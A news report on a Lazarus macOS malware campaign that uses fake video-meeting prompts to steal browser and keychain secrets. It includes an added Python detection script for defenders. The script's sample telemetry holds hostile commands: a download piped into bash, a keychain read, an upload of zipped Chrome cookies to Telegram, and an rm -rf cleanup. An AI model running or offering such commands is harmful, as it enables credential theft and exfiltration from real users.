Evidence has emerged that Lazarus, a North Korea-linked hacking group, has been running a new malware campaign targeting macOS environments.
On April 22 local time, blockchain media outlet Cointelegraph reported that the attack targeted not only cryptocurrency companies but also general companies and fintech firms. It said the method combined fake video meeting invitations with social engineering techniques.
Security researchers named the new malware kit "Mach-O Man". The malware spread through a ClickFix-style prompt and made victims think they were joining a fake Zoom or Google Meet session, then induced them to run specific commands themselves.
Mauro Eldritch, founder of BCA, said in a report released that day that the approach lets the malware download in the background, bypassing traditional controls without being detected.
If the attack succeeds, hackers can obtain credentials and access to internal systems at the victim company. Researchers said the campaign could lead to account takeovers, unauthorized access to infrastructure, financial losses and exposure of critical data. It also showed Lazarus' targets are expanding beyond crypto-only companies to a wider range of industries.
The final stage of the malware deployed an information-stealing program. The tool was designed to collect sensitive information such as browser extension data, stored browser credentials, cookies and macOS keychain items. The collected data was bundled into a compressed file and sent to attackers via Telegram.
The process of deleting traces was also automated. Researchers noted that the malware was configured to delete the entire kit using the system's rm command, and that the process bypasses the user confirmations or permission steps normally required for file deletion. That suggests attackers considered post-incident concealment as well as intrusion and data theft.
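The three stages the report describes, a paste-and-run prompt, harvesting of browser and keychain secrets, and Telegram upload followed by rm-based cleanup, each leave a recognisable trace in shell history or process telemetry. The script below is an added illustration of how a defender might flag that sequence; it is not code from the report, from BCA or from Any.run. The event lines are constructed, the hostnames and paths are placeholders, and the indicator patterns are assumptions about what such telemetry looks like rather than signatures taken from the campaign.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry: one shell-history or process-event line each.
# Hosts, paths and the bot token are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    "zsh: cd ~/Documents && open report.pdf",
    "zsh: curl -fsSL https://meet-update.example.invalid/fix.sh | bash",
    "exec: /usr/bin/security find-generic-password -ga 'Chrome Safe Storage'",
    "exec: /usr/bin/zip -r /tmp/.stage/out.zip /Users/alice/Library/Application Support/Google/Chrome/Default/Cookies",
    "net: curl -F document=@/tmp/.stage/out.zip https://api.telegram.org/botTOKEN/sendDocument",
    "exec: /bin/rm -rf /tmp/.stage",
    "zsh: git pull origin main",
]

# Assumed indicator classes, one per behaviour the article describes.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    # ClickFix-style prompt: user pastes a one-liner that pipes a download into a shell
    ("clickfix_pipe_to_shell", re.compile(r"curl\b[^|]*\|\s*(ba|z)?sh\b")),
    # Keychain item harvesting via the macOS `security` tool
    ("keychain_access", re.compile(r"\bsecurity\s+find-(generic|internet)-password\b")),
    # Browser credential / cookie stores being staged for packaging
    ("browser_secret_staging", re.compile(r"\b(Cookies|Login Data|Local Extension Settings)\b")),
    # Upload to the Telegram Bot API
    ("telegram_bot_api", re.compile(r"api\.telegram\.org/bot")),
    # Self-deletion of the staging directory with rm
    ("staging_dir_wipe", re.compile(r"\brm\s+-\w*r\w*\s+/tmp/")),
]

# Stages of the chain described in the report; used to decide whether
# isolated hits add up to the full intrusion-collection-exfil-cleanup pattern.
STAGES: Dict[str, set] = {
    "execute": {"clickfix_pipe_to_shell"},
    "collect": {"keychain_access", "browser_secret_staging"},
    "exfiltrate": {"telegram_bot_api"},
    "cleanup": {"staging_dir_wipe"},
}


def scan_events(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, indicator name) for every matching line."""
    hits = []
    for n, line in enumerate(lines, 1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((n, name))
    return hits


def assess(lines: List[str]) -> dict:
    """Map hits onto chain stages; escalate when three or more stages are seen."""
    hits = scan_events(lines)
    seen = {name for _, name in hits}
    covered = [stage for stage, names in STAGES.items() if seen & names]
    return {"hits": hits, "stages": covered, "escalate": len(covered) >= 3}


if __name__ == "__main__":
    result = assess(SAMPLE_EVENTS)
    for n, name in result["hits"]:
        print(f"line {n}: {name}")
    print("stages:", result["stages"], "escalate:", result["escalate"])
```

Any one of these indicators on its own is noisy (developers pipe curl into bash, and rm under /tmp is routine), which is why the assessment escalates only when several stages of the chain appear together rather than on a single match.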
The malware kit was reconstructed through the macOS analysis function of cloud-based malware sandbox Any.run. Researchers confirmed the attack flow and data exfiltration path based on that work.
Lazarus has repeatedly been identified as being behind major cryptocurrency hacking incidents. The group was also cited as the prime suspect in the 2025 Bybit hack, where losses were tallied at $1.4 billion, the largest hacking case in the industry to date.
Similar social engineering attacks continued this month. Zerion had about $100,000 stolen after some team members lost login sessions and credentials, along with access to the company's private keys. The attack was reported to have used social engineering techniques that leveraged artificial intelligence.
Against this backdrop, the case shows that Mac-based work environments can no longer be treated as relatively safe. The confirmed attack chain combined video meeting invitations, browser-based authentication and messenger-based transfers, increasing the need for cryptocurrency and fintech firms to review their endpoint security and account management controls.